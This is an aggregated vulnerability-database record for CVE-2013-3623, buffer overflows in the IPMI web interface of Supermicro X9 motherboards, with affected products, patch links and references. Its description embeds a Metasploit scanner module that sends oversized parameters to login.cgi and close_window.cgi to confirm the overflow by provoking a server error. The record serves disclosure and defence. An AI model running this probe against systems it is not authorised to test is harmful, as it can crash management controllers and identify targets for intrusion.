ID
VAR-201312-0076
CVE
CVE-2013-3623
TITLE
SuperMicro of X9 Run on generation motherboard IPMI Stack-based buffer overflow vulnerability in FW firmware
Trust: 0.8
DESCRIPTION
Multiple stack-based buffer overflows in cgi/close_window.cgi in the web interface in the Intelligent Platform Management Interface (IPMI) with firmware before 3.15 (SMT_X9_315) on Supermicro X9 generation motherboards allow remote attackers to execute arbitrary code via the (1) sess_sid or (2) ACT parameter. Supermicro IPMI is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. Attackers may be able to execute arbitrary code in the context of the affected firmware. Failed exploit attempts will likely result in denial-of-service conditions. Supermicro IPMI running firmware version SMT_X9_226 is vulnerable. Supermicro Intelligent Platform Management Interface (IPMI) is an IPMI card (Intelligent Platform Management Interface) of Supermicro, which can remotely control the system, such as remote booting, entering BIOS, etc. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'uri' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Supermicro Onboard IPMI CGI Vulnerability Scanner', 'Description' => %q{ This module checks for known vulnerabilities in the CGI applications of Supermicro Onboard IPMI controllers. These issues currently include several unauthenticated buffer overflows in the login.cgi and close_window.cgi components. }, 'Author' => [ 'hdm', # Discovery and analysis 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3621' ], [ 'CVE', '2013-3623' ], [ 'URL', 'https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/'] ], 'DisclosureDate' => '2013-11-06')) end def is_supermicro? res = send_request_cgi( { "uri" => "/", "method" => "GET" }) if res and res.code == 200 and res.body.to_s =~ /ATEN International Co Ltd\./ return true else return false end end def send_close_window_request(sess) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi/close_window.cgi", 'encode_params' => false, 'vars_post' => { 'sess_sid' => sess } }) return res end def check_close_window safe_check = Rex::Text.rand_text_alpha(20) trigger_check = Rex::Text.rand_text_alpha(132) res = send_close_window_request(safe_check) unless res and res.code == 200 and res.body.to_s =~ /Can't find action/ return false end res = send_close_window_request(trigger_check) unless res and res.code == 500 return false end return true end def send_login_request(name) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi/login.cgi", 'encode_params' => false, 'vars_post' => { 'name' => name, 'pwd' => Rex::Text.rand_text_alpha(4) } }) return res end def check_login safe_check = Rex::Text.rand_text_alpha(20) trigger_check = Rex::Text.rand_text_alpha(300) res = send_login_request(safe_check) unless res and res.code == 200 and res.body.to_s =~ /ATEN International Co Ltd\./ and res.body.to_s =~ /top\.location\.href = location\.href/ return false end res = send_login_request(trigger_check) unless res and res.code == 500 return false end return true end def run_host(ip) vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? vprint_good("Supermicro IPMI web interface found") else vprint_error("Supermicro IPMI web interface not found") return end vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, :proto => 'tcp', :name => "Supermicro Onboard IPMI login.cgi Buffer Overflow", :refs => self.references.select do |ref| ref.ctx_val == "2013-3621" end }) end vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, :proto => 'tcp', :name => "Supermicro Onboard IPMI close_window.cgi Buffer Overflow", :refs => self.references.select { |ref| ref.ctx_val == "2013-3623" } }) end end end
Trust: 2.16
AFFECTED PRODUCTS
| vendor: | supermicro | model: | intelligent platform management | scope: | eq | version: | 2.24 | Trust: 1.6 |
| vendor: | supermicro | model: | intelligent platform management | scope: | lte | version: | 2.26 | Trust: 1.0 |
| vendor: | super micro computer | model: | intelligent platform management interface | scope: | lt | version: | 3.15 (smt_x9_315) | Trust: 0.8 |
| vendor: | supermicro | model: | intelligent platform management | scope: | eq | version: | 2.26 | Trust: 0.6 |
| vendor: | super | model: | micro computer supermicro ipmi smt x9 226 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | citrix | model: | netscaler t1 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | citrix | model: | netscaler service delivery appliance | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | citrix | model: | netscaler gateway | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | citrix | model: | netscaler application delivery controller | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | citrix | model: | command center appliance | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | citrix | model: | cloudbridge | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | super | model: | micro computer supermicro ipmi smt x9 315 | scope: | ne | version: | - | Trust: 0.3 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-119 | Trust: 1.9 |
THREAT TYPE
remote
Trust: 0.6
TYPE
buffer overflow
Trust: 0.6
CONFIGURATIONS
EXPLOIT AVAILABILITY
PATCH
| title: | Top Page | url: | http://www.supermicro.com.tw/index_home.cfm | Trust: 0.8 |
| title: | Firmware Fixes to Common Vulnerabilities and Exposures | url: | http://www.supermicro.com/products/nfo/files/IPMI/CVE_Update.pdf | Trust: 0.8 |
| title: | SMT_X9_315 | url: | http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=47394 | Trust: 0.6 |
| title: | Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware | url: | https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins&qid=eb059834b7f24e2562bcf592b6d0afbc | Trust: 0.1 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-3623 | Trust: 3.0 |
| db: | BID | id: | 63775 | Trust: 2.1 |
| db: | EXPLOIT-DB | id: | 29666 | Trust: 1.8 |
| db: | JVNDB | id: | JVNDB-2013-005499 | Trust: 0.8 |
| db: | CNNVD | id: | CNNVD-201311-393 | Trust: 0.7 |
| db: | PACKETSTORM | id: | 124046 | Trust: 0.1 |
| db: | SEEBUG | id: | SSVID-83154 | Trust: 0.1 |
| db: | VULHUB | id: | VHN-63625 | Trust: 0.1 |
| db: | VULMON | id: | CVE-2013-3623 | Trust: 0.1 |
| db: | PACKETSTORM | id: | 181154 | Trust: 0.1 |
REFERENCES
| url: | https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities | Trust: 2.9 |
| url: | http://www.thomas-krenn.com/en/wiki/supermicro_ipmi_security_updates_november_2013 | Trust: 2.6 |
| url: | http://www.securityfocus.com/bid/63775 | Trust: 1.8 |
| url: | http://www.supermicro.com/products/nfo/files/ipmi/cve_update.pdf | Trust: 1.8 |
| url: | http://www.exploit-db.com/exploits/29666 | Trust: 1.8 |
| url: | https://support.citrix.com/article/ctx216642 | Trust: 1.5 |
| url: | http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3623 | Trust: 0.8 |
| url: | http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3623 | Trust: 0.8 |
| url: | http://www.supermicro.com/support/bios/firmware0.aspx | Trust: 0.3 |
| url: | https://cwe.mitre.org/data/definitions/119.html | Trust: 0.1 |
| url: | https://www.exploit-db.com/exploits/29666/ | Trust: 0.1 |
| url: | http://tools.cisco.com/security/center/viewalert.x?alertid=34571 | Trust: 0.1 |
| url: | https://nvd.nist.gov | Trust: 0.1 |
| url: | https://www.rapid7.com/db/modules/exploit/linux/http/smt_ipmi_close_window_bof | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-3623 | Trust: 0.1 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-3621 | Trust: 0.1 |
| url: | https://github.com/rapid7/metasploit-framework | Trust: 0.1 |
| url: | https://metasploit.com/download | Trust: 0.1 |
| url: | https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/'] | Trust: 0.1 |
CREDITS
HD Moore of Rapid7
Trust: 0.9
SOURCES
| db: | VULHUB | id: | VHN-63625 |
| db: | VULMON | id: | CVE-2013-3623 |
| db: | BID | id: | 63775 |
| db: | JVNDB | id: | JVNDB-2013-005499 |
| db: | PACKETSTORM | id: | 181154 |
| db: | CNNVD | id: | CNNVD-201311-393 |
| db: | NVD | id: | CVE-2013-3623 |
LAST UPDATE DATE
2024-11-23T22:49:33.165000+00:00
SOURCES UPDATE DATE
| db: | VULHUB | id: | VHN-63625 | date: | 2017-11-15T00:00:00 |
| db: | VULMON | id: | CVE-2013-3623 | date: | 2017-11-15T00:00:00 |
| db: | BID | id: | 63775 | date: | 2016-09-09T17:00:00 |
| db: | JVNDB | id: | JVNDB-2013-005499 | date: | 2013-12-16T00:00:00 |
| db: | CNNVD | id: | CNNVD-201311-393 | date: | 2013-12-12T00:00:00 |
| db: | NVD | id: | CVE-2013-3623 | date: | 2024-11-21T01:54:00.367 |
SOURCES RELEASE DATE
| db: | VULHUB | id: | VHN-63625 | date: | 2013-12-10T00:00:00 |
| db: | VULMON | id: | CVE-2013-3623 | date: | 2013-12-10T00:00:00 |
| db: | BID | id: | 63775 | date: | 2013-11-06T00:00:00 |
| db: | JVNDB | id: | JVNDB-2013-005499 | date: | 2013-12-16T00:00:00 |
| db: | PACKETSTORM | id: | 181154 | date: | 2024-09-01T16:45:29 |
| db: | CNNVD | id: | CNNVD-201311-393 | date: | 2013-11-29T00:00:00 |
| db: | NVD | id: | CVE-2013-3623 | date: | 2013-12-10T16:11:18.697 |